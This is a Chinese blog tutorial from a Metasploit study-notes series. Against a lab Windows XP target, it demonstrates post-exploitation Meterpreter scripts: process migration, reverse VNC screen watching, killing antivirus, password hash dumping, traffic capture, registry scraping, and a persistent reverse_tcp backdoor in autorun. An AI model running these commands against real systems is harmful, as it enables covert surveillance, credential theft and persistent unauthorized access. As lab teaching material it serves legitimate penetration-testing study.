Metasploit常用后渗透脚本——远程监视

最新推荐文章于 2024-01-06 12:00:00 发布

我重来不说话

最新推荐文章于 2024-01-06 12:00:00 发布

阅读量2.5k

点赞数 3

分类专栏：精通Metasploit学习笔记文章标签： metasploit 渗透测试 kali linux 后渗透脚本

本文链接：https://blog.csdn.net/qq_19623861/article/details/117607371

版权

精通Metasploit学习笔记专栏收录该内容

41 篇文章 32 订阅

订阅专栏

文章目录

前言
一、迁移进程
二、安装远程VNC会话
三、关闭杀毒软件
四、获取系统密码哈希值
五、查看目标机上的所有流量
六、提取系统信息
七、控制持久化
八、查看更多脚本
总结

前言

本文详细介绍了metasploit获取meterpreter权限常用的后渗透脚本的功能和实践过程

测试环境	描述	ip
主机	kali 2020	192.168.1.113
靶机	winxp sp3	192.168.1.106

首先使用ms08_067渗透模块对靶机进行渗透测试，详细步骤看
ms08_067漏洞渗透步骤——MSF获取meterpreter权限

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:1216) at 2021-06-05 22:43:39 +0800

meterpreter >

一、迁移进程

迁移进程的目的是让我们对靶机的控制更加隐蔽和持久，因为使用漏洞进行渗透测试，会在靶机内建立一个进程，非常容易被发现，迁移到更安全的进程上就好了

meterpreter > run post/windows/manage/migrate

[*] Running module against WINXP-1
[*] Current server process: svchost.exe (1156)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3716
[+] Successfully migrated into process 3716

二、安装远程VNC会话

可以在受控系统上运行一个交互式的远程图形化工具（可以让你看到对方屏幕上的一举一动）

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.113 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\QuUcZHEDZcd.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.113:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "winxp-1"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

靶机桌面图片

vnc服务

可能出现的问题
对方桌面可能被锁定导致无法访问到桌面，可以使用screen_unlock脚本进行解锁

meterpreter > run screen_unlock

三、关闭杀毒软件

杀毒软件可以阻止攻击过程

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...

四、获取系统密码哈希值

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a6cc07586ea276fb6bb10b5e6fbc07e5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

五、查看目标机上的所有流量

想要查看到目标系统上的所有网络流量，可以运行数据包记录脚本，所有被捕获的包都将以.pcap的文件格式保存下来，并能够被Wireshark解析，具体过程如下

meterpreter > run packetrecorder -i 1

[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WINXP-1_20210605.1818/WINXP-1_20210605.1818.cap
[*] Packet capture interval is 30 Seconds

六、提取系统信息

scraper脚本可以提取出所有系统信息，包括用户名和密码、下载全部注册表、挖掘密码哈希值等

meterpreter > run scraper
[*] New session on 192.168.1.106:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\WINDOWS\TEMP\XoAUidOI.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\WINDOWS\TEMP\nHtPKIjq.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\WINDOWS\TEMP\FaWycKSv.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\WINDOWS\TEMP\qKYvqXeA.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\WINDOWS\TEMP\DnovcEeK.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.1.106:445...

七、控制持久化

meterpreter的persistence脚本允许注入meterpreter代理，确保系统重启后还能连接到meterpreter。

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.113

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20210605.2824/WINXP-1_20210605.2824.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=443
[*] Persistent agent script is 99612 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\VAfovf.vbs
[*] Executing script C:\WINDOWS\TEMP\VAfovf.vbs
[+] Agent executed with PID 3384
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
meterpreter >

注入代理后，使用hanler进行监控

msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:443

八、查看更多脚本

打出run后按TAB键

meterpreter > run 
Display all 531 possibilities? (y or n)
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
......